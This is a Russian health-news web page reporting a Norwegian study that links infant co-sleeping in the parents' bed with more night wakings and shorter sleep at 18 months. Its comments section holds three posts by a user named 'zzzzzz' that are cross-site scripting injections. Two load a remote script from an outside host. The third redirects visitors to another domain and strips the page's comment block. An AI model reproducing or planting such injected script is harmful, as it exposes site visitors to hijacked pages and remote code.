Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем дальше ребенок – тем ...  >>  Чем дальше ребенок – тем крепче ваш сон. Как спать с ребенком?
 
Обратная связь
 

Чем дальше ребенок – тем крепче ваш сон. Как спать с ребенком?

Размер шрифта
07 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие родители укладывают своих маленьких детей спать вместе с собой, ведь это дает возможность лучше следить за ними в течение ночи. Однако оказалось, что такая практика может вести к нарушениям сна у малышей.

Чем дальше ребенок – тем крепче ваш сон. Как спать с ребенком?

Ночные пробуждения очень распространены среди шестимесячных детей, однако сон в родительской кровати не только не помогает справиться с этой проблемой, но и может ухудшить ситуацию. Совместный сон снижает продолжительность сна у ребенка и является причиной более частых ночных пробуждений. К такому выводу пришли ученые из Норвегии.

Хотя исследователи обнаружили общее снижение продолжительности сна и количества пробуждений, которое происходит в возрасте от 6 до 18 месяцев, частота возникновения хронических проблем со сном оставалась высокой и во многом зависела от предшествующего режима сна. «Сон в родительской кровати является независимым фактором, приводящим к частым ночным пробуждениям и сокращению длительности сна», – заявляют ученые.

«Около трети всех детей, у которых наблюдались ночные пробуждения в возрасте шести месяцев, продолжали страдать от этой проблемы и в 18 месяцев. У них также была выявлена более короткая продолжительность сна по сравнению с другими детьми того же возраста», – рассказывает Мари Хизинг, ведущий автор исследования. Всего в работе были проанализированы данные опроса 55 831 женщины. Результаты исследования были опубликованы в Journal of Developmental and Behavioral Pediatrics.

Чем больше времени ребенок спал в кровати родителей, тем выше был риск частых ночных пробуждений и короткой продолжительности сна в возрасте 18 месяцев. Кормление грудью было связано с более частыми пробуждениями в возрасте 6 месяцев, но не вызывало никаких проблем со сном в дальнейшем.

Так что пусть ребенок лучше спит в собственной кроватке, ведь это поможет ему сохранить здоровый режим сна.

Другие материалы о детстве и материнстве ищите на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:25

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?   Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать   Всемирная неделя первичного иммунодефицита начинается в Москве!   Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
В какой позе спать, чтобы проснуться?
Ждете ребенка? Приготовьте дом
Можно ли пережить беременность без рвоты?

Тесты

1
Будет ли у вас инфаркт?
Хорошо ли Вы спите?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.